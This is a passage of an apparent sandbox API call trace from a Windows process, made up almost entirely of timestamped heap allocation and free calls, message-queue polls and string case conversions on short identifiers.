Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0088.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0088.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0088.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0088.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f20 | out: hHeap=0x2af0000) returned 1 [0088.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0088.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0088.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0088.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0088.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0088.089] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0088.089] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0088.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0088.089] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0088.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0088.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0088.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a740d0 [0088.089] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0088.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0088.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0088.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0088.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0088.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0088.093] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0088.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0088.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0088.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0088.094] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0088.094] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0088.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0088.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.094] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a740d0 | out: hHeap=0x2af0000) returned 1 [0088.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.095] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0088.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.095] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0088.095] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0088.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0088.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0088.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0088.095] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0088.095] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0088.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0088.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0088.095] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0088.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0088.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0088.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.095] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0088.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0088.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0088.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0088.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0088.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0088.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0088.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0088.096] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0088.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0088.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0088.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0088.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0088.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0088.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0088.096] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0088.096] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0088.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0088.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0088.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0088.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0088.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0088.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0088.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0088.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0088.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0088.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0088.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0088.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0088.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0088.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0088.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0088.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0088.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0088.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0088.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0088.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0088.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0088.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.099] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0088.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 